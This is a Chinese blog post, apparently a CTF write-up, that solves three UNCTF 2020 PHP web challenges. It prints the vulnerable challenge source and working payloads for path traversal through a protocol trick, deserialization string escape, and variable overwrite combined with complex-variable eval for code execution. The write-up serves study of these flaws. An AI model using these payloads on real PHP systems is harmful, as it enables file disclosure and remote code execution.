

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/feiji.png">
  <link rel="icon" type="image/png" href="/img/feiji.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="sunzy">
  <meta name="keywords" content="">
  <title>UNCTF - 一路走到黑</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/a11y-light.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 4.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Sunzy'blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://i.loli.net/2020/10/24/eBR35xZYEbuzSW9.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-11-17 23:13" pubdate>
        2020年11月17日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      25
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">UNCTF</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：11 分钟前
                
              </p>
            
            <div class="markdown-body" id="post-body">
              <p>比赛和考试时间有点冲突，也没有好好做题，只好结束复现一下。</p>
<a id="more"></a>

<h3 id="easy-ssrf"><a href="#easy-ssrf" class="headerlink" title="easy_ssrf"></a>easy_ssrf</h3><div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-keyword">echo</span><span class="hljs-string">'&lt;center&gt;&lt;strong&gt;welc0me to 2020UNCTF!!&lt;/strong&gt;&lt;/center&gt;'</span>;
highlight_file(<span class="hljs-keyword">__FILE__</span>);
$url = $_GET[<span class="hljs-string">'url'</span>];
<span class="hljs-keyword">if</span>(preg_match(<span class="hljs-string">'/unctf\.com/'</span>,$url))&#123;
    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">'/php|file|zip|bzip|zlib|base|data/i'</span>,$url))&#123;
        $url=file_get_contents($url);
        <span class="hljs-keyword">echo</span>($url);
    &#125;<span class="hljs-keyword">else</span>&#123;
        <span class="hljs-keyword">echo</span>(<span class="hljs-string">'error!!'</span>);
    &#125;
&#125;<span class="hljs-keyword">else</span>&#123;
    <span class="hljs-keyword">echo</span>(<span class="hljs-string">"error"</span>);
&#125;
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>看下代码发现过滤了大部分协议名，一开始一直以为是使用特殊编码绕过结果行不通</p>
<p>后来才知道考点根本不绕过。</p>
<p>payload：</p>
<div class="hljs"><pre><code class="hljs coffeescript">?file=unctf.com<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>../../flag
<span class="hljs-regexp">//</span>不唯一
?file=():unctf.com<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>../flag
<span class="hljs-regexp">//</span>()里可以填任意字符除了正则过滤的几个协议</code></pre></div>

<p><strong>原理：</strong>当php遇到一个不认识的protocol时，会抛出一个warning，并将protocol设置为null,在protoco为null或file时，则进行本地操作。默认情况下不传协议或传入了不存在协议，会进行本地文件操作。</p>
<h2 id="easyunserialize"><a href="#easyunserialize" class="headerlink" title="easyunserialize"></a>easyunserialize</h2><p><strong>考察点是反序列化字符逃逸</strong></p>
<p>先冲简单的PHP反序列化字符逃逸了解什么是反序化逃逸。</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">filter</span><span class="hljs-params">($str)</span></span>&#123;
    <span class="hljs-keyword">return</span> str_replace(<span class="hljs-string">'bb'</span>, <span class="hljs-string">'ccc'</span>, $str);
&#125;
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">A</span></span>&#123;
    <span class="hljs-keyword">public</span> $name=<span class="hljs-string">'aaaa'</span>;
    <span class="hljs-keyword">public</span> $pass=<span class="hljs-string">'123456'</span>;
&#125;
$AA=<span class="hljs-keyword">new</span> A();
$res=filter(serialize($AA));

$c=unserialize($res);
<span class="hljs-keyword">echo</span> $c-&gt;pass;

<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>利用反序列化逃逸修改pass的值。</p>
<p>正常的序列化结果</p>
<div class="hljs"><pre><code class="hljs css"><span class="hljs-selector-tag">O</span><span class="hljs-selector-pseudo">:1</span><span class="hljs-selector-pseudo">:"A"</span><span class="hljs-selector-pseudo">:2</span>:&#123;<span class="hljs-attribute">s</span>:<span class="hljs-number">4</span>:<span class="hljs-string">"name"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">4</span>:<span class="hljs-string">"aaaa"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">4</span>:<span class="hljs-string">"pass"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">6</span>:<span class="hljs-string">"123456"</span>;&#125;</code></pre></div>

<p><code>s:4:&quot;aaaa&quot;</code>s后面的数字表示变量的长度，php执行的时候会根据其长度读取数据，如果不符合规则则会反序列化失败。</p>
<p>例如</p>
<div class="hljs"><pre><code class="hljs css"><span class="hljs-selector-tag">O</span><span class="hljs-selector-pseudo">:1</span><span class="hljs-selector-pseudo">:"A"</span><span class="hljs-selector-pseudo">:2</span>:&#123;<span class="hljs-attribute">s</span>:<span class="hljs-number">4</span>:<span class="hljs-string">"name"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">5</span>:<span class="hljs-string">"aaaa"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">4</span>:<span class="hljs-string">"pass"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">6</span>:<span class="hljs-string">"123456"</span>;&#125;</code></pre></div>

<p>将4改为5，那么则认为name的值为 <code>aaaa&quot;</code>,此时因为前面的”无法闭合而导致反序列化失败。</p>
<p><img src="https://i.loli.net/2020/11/18/Ctefk8iKXP34Gmn.png" srcset="/img/loading.gif" alt="error.png"></p>
<p>而上面的程序中存在一个替换函数，只要name中存在bb则将其替换为ccc，导致name字段的长度会增加1，我们将逃逸的字符串的长度填充成我们要反序列化的代码的话那就可以控制反序列化的结果以及类里面的变量值了。那么就可以利用这个函数来构造出想要的序列化字符串。</p>
<p>例如想将pass变量的序列化字符串如下</p>
<div class="hljs"><pre><code class="hljs css">";<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:4</span><span class="hljs-selector-pseudo">:"pass"</span>;<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:6</span><span class="hljs-selector-pseudo">:"hacker"</span>;&#125;</code></pre></div>

<p>其中 前面的 “;是为了闭合的变量的”，保证语法正确，}的作用是序列化字符串结束的标志</p>
<p>上面的字符串长度为27，所以就需要27个bb来产生27个字符长度的逃逸</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">filter</span><span class="hljs-params">($str)</span></span>&#123;
    <span class="hljs-keyword">return</span> str_replace(<span class="hljs-string">'bb'</span>, <span class="hljs-string">'ccc'</span>, $str);
&#125;
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">A</span></span>&#123;
    <span class="hljs-keyword">public</span> $name=<span class="hljs-string">'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";s:4:"pass";s:6:"hacker";&#125;'</span>;
    <span class="hljs-keyword">public</span> $pass=<span class="hljs-string">'123456'</span>;
&#125;
$AA=<span class="hljs-keyword">new</span> A();
var_dump(serialize($AA));
$res=filter(serialize($AA));
var_dump($res);
$c=unserialize($res);
<span class="hljs-keyword">echo</span> $c-&gt;pass;
<span class="hljs-comment">//echo unserialize($AA);</span>
<span class="hljs-comment">//";s:4:"pass";s:6:"hacker";&#125;</span>
<span class="hljs-meta">?&gt;</span>
   <span class="hljs-comment">//结果如下   ||为对齐</span>
<span class="hljs-comment">/*</span>
<span class="hljs-comment">string(136) "O:1:"A":2:&#123;s:4:"name";s:81:"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";s:4:"pass";s:6:"hacker";&#125;";s:4:"pass";s:6:"123456";&#125;"||</span>
<span class="hljs-comment">string(163) "O:1:"A":2:&#123;s:4:"name";s:81:"ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc";s:4:"pass";s:6:"hacker";&#125;"||;s:4:"pass";s:6:"123456";&#125;"</span>
<span class="hljs-comment">hacker</span>
<span class="hljs-comment">*/</span></code></pre></div>

<p><img src="https://i.loli.net/2020/11/18/qgC18vQGcElFy2e.png" srcset="/img/loading.gif" alt="success.png"></p>
<p>这里pass的值就被该称了hacker</p>
<p>总结：<strong>逃逸或者说被“顶”出来的payload就会被当做当前类的属性被执行。</strong></p>
<p><a href="https://www.cnblogs.com/Sumarua/p/12932401.html" target="_blank" rel="noopener">参考</a></p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
error_reporting(<span class="hljs-number">0</span>);
highlight_file(<span class="hljs-keyword">__FILE__</span>);

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">a</span></span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> $uname;
    <span class="hljs-keyword">public</span> $password;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($uname,$password)</span></span>
<span class="hljs-function">    </span>&#123;
        <span class="hljs-keyword">$this</span>-&gt;uname=$uname;
        <span class="hljs-keyword">$this</span>-&gt;password=$password;
    &#125;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span><span class="hljs-params">()</span></span>
<span class="hljs-function">    </span>&#123;
            <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;password===<span class="hljs-string">'easy'</span>)
            &#123;
                <span class="hljs-keyword">include</span>(<span class="hljs-string">'flag.php'</span>);
                <span class="hljs-keyword">echo</span> $flag;    
            &#125;
            <span class="hljs-keyword">else</span>
            &#123;
                <span class="hljs-keyword">echo</span> <span class="hljs-string">'wrong password'</span>;
            &#125;
        &#125;
    &#125;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">filter</span><span class="hljs-params">($string)</span></span>&#123;
    <span class="hljs-keyword">return</span> str_replace(<span class="hljs-string">'challenge'</span>,<span class="hljs-string">'easychallenge'</span>,$string);
&#125;

$uname=$_GET[<span class="hljs-number">1</span>];
$password=<span class="hljs-number">1</span>;
$ser=filter(serialize(<span class="hljs-keyword">new</span> a($uname,$password)));
$test=unserialize($ser);
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>这段代码的意思大致为，get方式提交一个1，之后生成一个序列化字符串并将字符串中的challenge换成easychallenge，字符长度增加4，当密码为easy时，得到flag。这题看上去与上面的例子差不多，但是构造的时候发现并不是</p>
<p>需要构造的属性</p>
<div class="hljs"><pre><code class="hljs css">";<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:4</span><span class="hljs-selector-pseudo">:"password"</span>;<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:4</span><span class="hljs-selector-pseudo">:"easy"</span>;&#125;</code></pre></div>

<p>可以发现上面的字符串长度为29，而每替换一个challenge只能逃逸出4个字符，不能构造出29，因此这里需要再构造出一个属性，使上面的字符串的长度为4的倍数。</p>
<div class="hljs"><pre><code class="hljs css">";<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:8</span><span class="hljs-selector-pseudo">:"password"</span>;<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:4</span><span class="hljs-selector-pseudo">:"easy"</span>;<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:4</span><span class="hljs-selector-pseudo">:"aaaa"</span>;<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:1</span><span class="hljs-selector-pseudo">:"a"</span>;&#125;</code></pre></div>

<p>上面构造出的payload长度为48因此还需要12个challenge。</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">a</span></span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> $uname=<span class="hljs-string">'challengechallengechallengechallengechallengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";s:4:"aaaa";s:1:"a";&#125;'</span>;
    <span class="hljs-keyword">public</span> $password=<span class="hljs-string">"1"</span>;
&#125;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">filter</span><span class="hljs-params">($string)</span></span>&#123;
    <span class="hljs-keyword">return</span> str_replace(<span class="hljs-string">'challenge'</span>,<span class="hljs-string">'easychallenge'</span>,$string);
&#125;
$ser=filter(serialize(<span class="hljs-keyword">new</span> a($uname,$password)));
<span class="hljs-keyword">echo</span>($ser);
<span class="hljs-meta">?&gt;</span></code></pre></div>



<div class="hljs"><pre><code class="hljs scss">O:<span class="hljs-number">1</span>:<span class="hljs-string">"a"</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">5</span>:<span class="hljs-string">"uname"</span>;s:<span class="hljs-number">156</span>:<span class="hljs-string">"easychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallenge"</span>;s:<span class="hljs-number">8</span>:<span class="hljs-string">"password"</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">"easy"</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">"aaaa"</span>;s:<span class="hljs-number">1</span>:<span class="hljs-string">"a"</span>;&#125;";s:<span class="hljs-number">8</span>:<span class="hljs-string">"password"</span>;s:<span class="hljs-number">1</span>:<span class="hljs-string">"1"</span>;&#125;

<span class="hljs-comment">//easychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallenge  长度为156</span></code></pre></div>

<p>finalpayload：</p>
<div class="hljs"><pre><code class="hljs css"><span class="hljs-selector-tag">challengechallengechallengechallengechallengechallengechallengechallengechallengechallengechallengechallenge</span>";<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:8</span><span class="hljs-selector-pseudo">:"password"</span>;<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:4</span><span class="hljs-selector-pseudo">:"easy"</span>;<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:4</span><span class="hljs-selector-pseudo">:"aaaa"</span>;<span class="hljs-selector-tag">s</span><span class="hljs-selector-pseudo">:1</span><span class="hljs-selector-pseudo">:"a"</span>;&#125;</code></pre></div>

<h2 id="easyphp"><a href="#easyphp" class="headerlink" title="easyphp"></a>easyphp</h2><p>给了提示  /source查看源码</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>

$adminPassword = <span class="hljs-string">'d8b8caf4df69a81f2815pbcb74cd73ab'</span>;
<span class="hljs-keyword">if</span> (!function_exists(<span class="hljs-string">'fuxkSQL'</span>)) &#123;
    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">fuxkSQL</span><span class="hljs-params">($iText)</span>    </span>
<span class="hljs-function">    </span>&#123;
        $oText = $iText;
        $oText = str_replace(<span class="hljs-string">'\\\\'</span>, <span class="hljs-string">'\\'</span>, $oText);
        $oText = str_replace(<span class="hljs-string">'\"'</span>, <span class="hljs-string">'"'</span>, $oText);
        $oText = str_replace(<span class="hljs-string">"\'"</span>, <span class="hljs-string">"'"</span>, $oText);
        $oText = str_replace(<span class="hljs-string">"'"</span>, <span class="hljs-string">"''"</span>, $oText);
        <span class="hljs-keyword">return</span> $oText;
    &#125;
&#125;
<span class="hljs-keyword">if</span> (!function_exists(<span class="hljs-string">'getVars'</span>)) &#123;
    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getVars</span><span class="hljs-params">()</span></span>
<span class="hljs-function">    </span>&#123;
        $totals = array_merge($_GET, $_POST);
        <span class="hljs-keyword">if</span> (count($_GET)) &#123;
            <span class="hljs-keyword">foreach</span> ($_GET <span class="hljs-keyword">as</span> $key =&gt; $value) &#123;
                <span class="hljs-keyword">global</span> $&#123;$key&#125;;
                <span class="hljs-keyword">if</span> (is_array($value)) &#123;
                    $temp_array = <span class="hljs-keyword">array</span>();
                    <span class="hljs-keyword">foreach</span> ($value <span class="hljs-keyword">as</span> $key2 =&gt; $value2) &#123;
                        <span class="hljs-keyword">if</span> (function_exists(<span class="hljs-string">'mysql_real_escape_string'</span>)) &#123;
                            $temp_array[$key2] = fuxkSQL(trim($value2));
                        &#125; <span class="hljs-keyword">else</span> &#123;
                            $temp_array[$key2] = str_replace(<span class="hljs-string">'"'</span>, <span class="hljs-string">'\"'</span>, str_replace(<span class="hljs-string">"'"</span>, <span class="hljs-string">"\'"</span>, (trim($value2))));
                        &#125;
                    &#125;
                    $&#123;$key&#125; = $_GET[$key] = $temp_array;
                &#125; <span class="hljs-keyword">else</span> &#123;
                    <span class="hljs-keyword">if</span> (function_exists(<span class="hljs-string">'mysql_real_escape_string'</span>)) &#123;
                        $&#123;$key&#125; = fuxkSQL(trim($value));
                    &#125; <span class="hljs-keyword">else</span> &#123;
                        $&#123;$key&#125; = $_GET[$key] = str_replace(<span class="hljs-string">'"'</span>, <span class="hljs-string">'\"'</span>, str_replace(<span class="hljs-string">"'"</span>, <span class="hljs-string">"\'"</span>, (trim($value))));
                    &#125;
                &#125;
            &#125;
        &#125;
    &#125;
&#125;
getVars();
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($source)) &#123;
    highlight_file(<span class="hljs-keyword">__FILE__</span>);
&#125;
<span class="hljs-comment">//只有admin才能设置环境变量</span>
<span class="hljs-keyword">if</span> (md5($password) === $adminPassword &amp;&amp; sha1($verif) == $verif) &#123;
    <span class="hljs-keyword">echo</span> <span class="hljs-string">'you can set config variables!!'</span> . <span class="hljs-string">'&lt;/br&gt;'</span>;
    <span class="hljs-keyword">foreach</span> (array_keys($GLOBALS) <span class="hljs-keyword">as</span> $key) &#123;
        <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">'/var\d&#123;1,2&#125;/'</span>, $key) &amp;&amp; strlen($GLOBALS[$key]) &lt; <span class="hljs-number">12</span>) &#123;
            @<span class="hljs-keyword">eval</span>(<span class="hljs-string">"\$$key"</span> . <span class="hljs-string">'="'</span> . $GLOBALS[$key] . <span class="hljs-string">'";'</span>);
        &#125;
    &#125;
&#125; <span class="hljs-keyword">else</span> &#123;
    <span class="hljs-keyword">foreach</span> (array_keys($GLOBALS) <span class="hljs-keyword">as</span> $key) &#123;
        <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">'/var\d&#123;1,2&#125;/'</span>, $key)) &#123;
            <span class="hljs-keyword">echo</span> ($GLOBALS[$key]) . <span class="hljs-string">'&lt;/br&gt;'</span>;
        &#125;
    &#125;
&#125;</code></pre></div>

<p>代码很长，但是很容易理解 </p>
<p>fuxkSQL是将可能存在sql注入的符号转义</p>
<p>getvarh是将传的参数赋值</p>
<p>global ${$key};这里存在两个$$，所以可能存在变量覆盖</p>
<p>if (md5($password) === $adminPassword &amp;&amp; sha1($verif) == $verif) </p>
<p>$password的md5值与adminPassword,这里可以利用变量覆盖绕过</p>
<p>password=111&amp;adminPassword=md(111)</p>
<p>sha1($verif)==$verif弱类型比较，也很容易绕过</p>
<p>sha1($a)=0exxx</p>
<p>只要找出0e开头的字符串的sha1值为0e开头</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-keyword">for</span> ($i5 = <span class="hljs-number">0</span>; $i5 &lt;= <span class="hljs-number">9999999999</span>; $i5++) &#123;
    $res = <span class="hljs-string">'0e'</span> . $i5;
    <span class="hljs-comment">//0e1290633704</span>
    <span class="hljs-keyword">if</span> ($res == hash(<span class="hljs-string">'sha1'</span>, $res)) &#123;
        print_r($res);
    &#125;
&#125;</code></pre></div>

<p>所以verif=0e1290633704</p>
<p>重点在这</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-keyword">foreach</span> (array_keys($GLOBALS) <span class="hljs-keyword">as</span> $key) &#123;
        <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">'/var\d&#123;1,2&#125;/'</span>, $key) &amp;&amp; strlen($GLOBALS[$key]) &lt; <span class="hljs-number">12</span>) &#123;
            @<span class="hljs-keyword">eval</span>(<span class="hljs-string">"\$$key"</span> . <span class="hljs-string">'="'</span> . $GLOBALS[$key] . <span class="hljs-string">'";'</span>);
        &#125;
    &#125;</code></pre></div>

<ul>
<li>这段是将设置var开头，后面带1到2个数字变量的值，类似于var1=xxx或者var12=xxx 这样的</li>
<li>由于变量覆盖的环节限制了单双引号的输入，所以这里的解法为利用php复杂变量getshell</li>
</ul>
<p>什么是php复杂变量getshell</p>
<p>PHP复杂变量</p>
<p>{}不能被转移，其包裹的部分可当作变量<br>就是${phpinfo()}和{${phpinfo()}}是一样的，花括号{}只是用于区别变量边界的标识符</p>
<p>payload:</p>
<div class="hljs"><pre><code class="hljs dts">?source=<span class="hljs-number">1</span><span class="hljs-variable">&amp;</span>adminPassword=c4ca4238a0b923820dcc509a6f75849b<span class="hljs-variable">&amp;password</span>=<span class="hljs-number">1</span><span class="hljs-variable">&amp;verif</span>=<span class="hljs-number">0e1290633704</span><span class="hljs-variable">&amp;var1</span>=&#123;$_GET[<span class="hljs-number">1</span>]&#125;<span class="hljs-variable">&amp;var3</span>=$&#123;$var1()&#125;<span class="hljs-variable">&amp;1</span>=phpinfo
<span class="hljs-comment">//var1=&#123;phpinfo&#125;  </span>
<span class="hljs-comment">//var3=$&#123;$var1&#125;=$&#123;phpinfo&#125;</span></code></pre></div>

<p>flag藏在phpinfo中，ctrl+f搜素flag即可</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/ctf/">ctf</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/ssrf/">ssrf</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/11/04/%E7%AE%97%E6%B3%95%E4%B8%8A%E6%9C%BA%E5%A4%8D%E4%B9%A0/">
                        <span class="hidden-mobile">算法上机复习</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script type="text/javascript">
    function loadValine() {
      addScript('https://cdn.staticfile.org/valine/1.4.14/Valine.min.js', function () {
        new Valine({
          el: "#vcomments",
          app_id: "2rPljbm5WOxA9BCPXqy3VE5y-gzGzoHsz",
          app_key: "SCoIn2Qp99a7ITtPhkAi6Chw",
          placeholder: "说点什么吧~~~",
          path: window.location.pathname,
          avatar: "retro",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: false,
          serverURLs: "",
        });
      });
    }
    waitElementVisible('vcomments', loadValine);
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://valine.js.org" target="_blank" rel="nofollow noopener noopener">comments
      powered by Valine.</a></noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

  <div class="col-lg-7 mx-auto nopadding-md">
    <div class="container custom post-content mx-auto">
      <img src="https://octodex.github.com/images/jetpacktocat.png" srcset="/img/loading.gif" class="rounded mx-auto d-block mt-5" style="width:150px; height:150px;">
    </div>
  </div>


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>

<!-- SCRIPTS -->
